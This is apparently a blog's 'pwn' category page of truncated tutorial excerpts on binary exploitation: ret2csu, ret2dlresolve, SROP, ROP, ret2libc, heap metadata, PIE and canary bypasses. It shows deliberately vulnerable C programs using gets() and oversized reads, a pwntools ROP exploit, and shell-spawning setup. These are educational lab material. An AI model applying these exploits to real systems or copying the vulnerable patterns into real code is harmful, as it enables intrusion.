Articles in category: pwn

ret2csu

Vulnerable program #include <stdio.h> int win(int x, int y, int z) { if(z == 0xdeadbeefcafed00d) { puts("Awesome work!"); } } int main() { puts("Come on then, ret2csu me"); char input[30]; gets(input); return 0; } Exploitation analysis Regular exploitation The overflow controls rip and points it at a gadget; the gadget is responsible for calling win. Exploit code: from pwn import * elf = context.binary = ELF('./vuln') p = process() log.info(f'win addr is : {hex(elf.sym.win)}') offset = 40 rop = ROP(elf) rop.raw(offset * 'a') rop.win(0,0,0xdeadbeefcafed00d) p.recv() p.sendline(rop.chain()) result = p.recvline() log.info(result) The code above assumes that suitable gadgets exist to build the chain, but in practice……

Read more

ret2dlresolve

Summary With ret2dlresolve, an attacker can trick the binary into resolving a function of their choosing (such as system) through the PLT. A dynamically linked ELF object imports libc functions on their first use through the PLT and GOT. When a runtime symbol is relocated, RIP jumps into the PLT and attempts to resolve that symbol. During this process, a &quo……

Read more

socket exploitation

socket vuln #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <string.h> #include <netdb.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> void vuln(int childfd) { char buffer[30]; read(childfd, buffer, 500); write(childfd, "Thanks!", 8); } void win() { system("/bin/sh"); } ////////////////////// Socket Stuff /* * error - wrapper for perror */ void error(char *msg) { perror(msg); exit(1); } int main(int argc, char **argv) { int parentfd; /* parent socket */ int childfd; /* child socket */ int portno; /* port to listen on */ int clientlen; /* byte size of client's address */ struct sockaddr_in serveraddr; /* server's addr */ struct sockaddr_in clientaddr; /* client addr */ struct hostent *hostp; /* client host info */ char *hostaddrp; /* dotted decimal host addr string */ int optval; /* flag value for setsockopt */ int n; /* message byte size */ /* * check……

Read more

SROP

SROP Sigreturn Oriented Programming (SROP), a novel technique for exploits and backdoors in UNIX-like systems. See [1] for details. Vulnerable program The vuln program: from pwn import * context.arch = 'amd64' context.os = 'linux' elf = ELF.from_assembly( ''' mov rdi, 0; mov rsi, rsp; sub rsi, 8; mov rdx, 500; syscall; ret; pop rax; ret; ''', vma=0x41000 ) elf.save('vuln') └─$ cat /usr/include/asm/unistd_64.h | grep -i sigreturn -A2 #define __NR_rt_sigreturn 15 #define __NR_ioctl 16 #define __NR_pread64 17 Embedding the shell string ┌──(kali㉿kali)-[~/exploits/srop] └─$ echo -en "/bin/sh\x00" >> vuln ┌──(k……

Read more

ROP

ROP Return-oriented Programming defeats the W⊕X protections recently deployed by Microsoft, Intel, and AMD; in this context, it can be seen as a generalization of traditional return-into-libc attacks. But the threat is more general. gadget What is a gadget Each gadget is an arrangement of words on the stack, both pointers to instruction sequences and immediate data words, that when invoked accomplishes some well-defined task. "W⊕X" ensures that no memory location in a process image is marked both writable ("W") and executable ("X"). Gadget features One gadget might perform a load operation, another an xor, and another a conditional branch. Example program from pwn import * context.arch = 'amd64' context.os = 'linux' elf = ELF.from_assembly( ''' mov rdi, 0; mov rsi, rsp; sub rsi, 8; mov rdx,……

Read more

heap: chunks and bins

chunks On x86_64 a chunk carries 16 extra bytes of metadata; on x86 it carries 8 extra bytes. metadata := prev size + size + flags(A,M,P) prev size: if the preceding adjacent chunk has been freed, this holds the size of that chunk. size: the size of this chunk. P(0x01): Previous in Use, indicates whether the preceding chunk is allocated and in use; when P == 0, the chunk before this one……

Read more

ret2libc

ret2libc When the program is built with NX protection, traditional shellcode placed on the stack cannot be executed and so cannot be used to spawn a shell; the ret2libc technique can be used instead. Vulnerable program #include <stdio.h> void vuln() { char buffer[64]; puts("Overflow me"); gets(buffer); } int main() { vuln(); } gcc vuln.c -m32 -fno-stack-protector -no-pie -o vuln-32 └─$ checksec --file=./vuln-32 [*] '/home/kali/exploits/ret2libc/vuln-32' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) Exploitation plan Point eip directly at system('/bin/……

Read more

PIE bypass

pie PIE (Position Independent Executable) is an executable format commonly used to harden a program's address space. With PIE, the code loaded into memory is not mapped to a fixed address, so on every load it is harder for other programs to predict where it will end up. Examples of code relocation include: load-time techniques (load-ti……

Read more

Stack canary leak techniques

What is a canary Security cookies: assume that at the beginning of a function call (e.g. during its prologue) we save a value in the function's stack frame; we would expect (if everything went well) to read the same value just before the function exits, namely at its epilogue. If the value has changed, the execution of the program is terminated and an error message is displayed. [1] Obviously, this protection mechanism is added by the compiler during the compilation process. For the GNU Compiler Collection (gcc), it is implemented via the StackGuard extension, which was added to gcc 2.7.2.2 [1] Bypass stack canary Vulnerable program……

Read more